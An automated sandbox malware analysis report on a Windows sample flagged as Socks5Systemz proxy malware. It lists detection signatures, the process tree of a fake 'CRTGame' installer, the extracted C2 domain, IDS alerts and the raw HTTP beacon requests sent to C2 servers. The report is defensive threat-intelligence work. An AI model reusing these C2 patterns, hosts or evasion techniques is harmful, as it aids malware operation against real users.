Edit tour

Windows Analysis Report
wG1fFAzGfH.exe

Overview

General Information

Sample name:	wG1fFAzGfH.exe renamed because original name is a hash value
Original sample name:	439194c0af02fd82c5540a082543090f.exe
Analysis ID:	1575098
MD5:	439194c0af02fd82c5540a082543090f
SHA1:	4f113878dc99fa7e079a95bda31f3abc351fa8ef
SHA256:	abeee1f06b6b4634fcf4cc47b6ff341537f96e3adaf2b351b213321e26e07177
Tags:	exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Petite Virus, Socks5Systemz

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Petite Virus

Yara detected Socks5Systemz

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to infect the boot sector

PE file has nameless sections

Uses schtasks.exe or at.exe to add and modify task schedules

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

wG1fFAzGfH.exe (PID: 4872 cmdline: "C:\Users\user\Desktop\wG1fFAzGfH.exe" MD5: 439194C0AF02FD82C5540A082543090F)

wG1fFAzGfH.tmp (PID: 5476 cmdline: "C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp" /SL5="$103C0,6985375,54272,C:\Users\user\Desktop\wG1fFAzGfH.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)

schtasks.exe (PID: 2988 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

crtgame.exe (PID: 1472 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: A158C99AA92F0E29ED84BB25976D4F7A)

net.exe (PID: 5140 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5952 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

crtgame.exe (PID: 1812 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: A158C99AA92F0E29ED84BB25976D4F7A)

cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["kruxjou.ua"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\CRTGame\bin\x86\is-J5DR2.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-RPVR0.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-JKH63.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-DDN59.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-VKOGP.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-V5C1L.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-FQCKS.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-8HTIS.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3368674379.0000000002B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
Process Memory Space: crtgame.exe PID: 1812	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security

Suricata Signatures

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T13:23:16.646042+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49849	94.232.249.187	80	TCP
2024-12-14T13:23:29.803670+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49880	94.232.249.187	80	TCP
2024-12-14T13:23:42.941918+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49912	94.232.249.187	80	TCP
2024-12-14T13:23:49.600943+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49944	185.237.206.129	80	TCP
2024-12-14T13:23:51.108071+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49948	185.237.206.129	80	TCP
2024-12-14T13:23:54.940125+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49948	185.237.206.129	80	TCP
2024-12-14T13:23:56.445209+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49962	185.237.206.129	80	TCP
2024-12-14T13:23:58.088059+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49969	185.237.206.129	80	TCP
2024-12-14T13:23:59.586921+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49972	185.237.206.129	80	TCP
2024-12-14T13:24:01.092535+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49976	185.237.206.129	80	TCP
2024-12-14T13:24:02.607207+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49981	185.237.206.129	80	TCP
2024-12-14T13:24:04.131362+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49984	185.237.206.129	80	TCP
2024-12-14T13:24:05.637264+0100	2049467	1	A Network Trojan was detected	192.168.2.6	49989	185.237.206.129	80	TCP

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T13:23:16.646042+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49849	94.232.249.187	80	TCP
2024-12-14T13:23:29.803670+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49880	94.232.249.187	80	TCP
2024-12-14T13:23:42.941918+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49912	94.232.249.187	80	TCP
2024-12-14T13:23:49.600943+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49944	185.237.206.129	80	TCP
2024-12-14T13:23:51.108071+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49948	185.237.206.129	80	TCP
2024-12-14T13:23:54.940125+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49948	185.237.206.129	80	TCP
2024-12-14T13:23:56.445209+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49962	185.237.206.129	80	TCP
2024-12-14T13:23:58.088059+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49969	185.237.206.129	80	TCP
2024-12-14T13:23:59.586921+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49972	185.237.206.129	80	TCP
2024-12-14T13:24:01.092535+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49976	185.237.206.129	80	TCP
2024-12-14T13:24:02.607207+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49981	185.237.206.129	80	TCP
2024-12-14T13:24:04.131362+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49984	185.237.206.129	80	TCP
2024-12-14T13:24:05.637264+0100	2049468	1	A Network Trojan was detected	192.168.2.6	49989	185.237.206.129	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: wG1fFAzGfH.exe

Avira: detected

Found malware configuration

Source: crtgame.exe.1812.7.memstrmin

Malware Configuration Extractor: Socks5Systemz {"C2 list": ["kruxjou.ua"]}

Multi AV Scanner detection for submitted file

Source: wG1fFAzGfH.exe	Virustotal: Detection: 57%			Perma Link
Source: wG1fFAzGfH.exe	ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,	1_2_0045C8A8
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0045C95C ArcFourCrypt,	1_2_0045C95C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0045C974 ArcFourCrypt,	1_2_0045C974
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_10001000 ISCryptGetVersion,	1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_10001130 ArcFourCrypt,	1_2_10001130

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack

Source: wG1fFAzGfH.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source:	Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-9BPJ8.tmp.1.dr
Source:	Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-A2FB0.tmp.1.dr

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004520C0 FindFirstFileA,GetLastError,	1_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,	1_2_00473F08
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_00496568
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463404
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463880
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,	1_2_00461E78

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49984 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49984 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49962 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49849 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49972 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49849 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49981 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49981 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49948 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49972 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49962 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49989 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49989 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49948 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49969 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49969 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49944 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49944 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49880 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49880 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49976 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49976 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:49912 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.6:49912 -> 94.232.249.187:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: kruxjou.ua

Source: global traffic

TCP traffic: 192.168.2.6:49952 -> 89.105.201.183:2023

Source: Joe Sandbox View

IP Address: 89.105.201.183 89.105.201.183

Source: Joe Sandbox View	ASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
Source: Joe Sandbox View	ASN Name: ITLDC-NLUA ITLDC-NLUA

Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: dtxiplc.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: dtxiplc.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: dtxiplc.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 152.89.198.214
Source: unknown	UDP traffic detected without corresponding DNS query: 45.155.250.90

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 7_2_02C32B95 WSASetLastError,WSARecv,WSASetLastError,select,

7_2_02C32B95

Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: dtxiplc.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: dtxiplc.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: dtxiplc.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1Host: kruxjou.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Source: global traffic	DNS traffic detected: DNS query: dtxiplc.info
Source: global traffic	DNS traffic detected: DNS query: kruxjou.ua

Source: crtgame.exe, 00000007.00000002.3367201054.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.237.206.129/
Source: crtgame.exe, 00000007.00000002.3369579330.00000000035B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde
